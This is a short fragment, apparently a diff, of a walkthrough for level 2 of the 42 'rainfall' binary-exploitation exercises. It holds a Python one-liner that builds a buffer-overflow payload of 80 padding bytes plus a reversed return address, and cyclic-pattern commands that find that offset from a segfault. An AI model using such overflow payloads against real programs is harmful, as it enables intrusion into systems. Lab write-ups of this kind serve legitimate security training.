AyoubBenBrahim/42-rainfall/level2/walkthrough.md

 $(python -c 'print "-" * 80 + "\x08\x04\x84\xe2"[::-1] ')

-there is not system() therefore no shell to jump to
+there is no system() therefore no shell to jump to

+cyclic 100
+aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

+Segmentation fault.
+0x61616175

+unhex 61616175 | rev ; echo ""
+uaaa

+cyclic -l uaaa
+80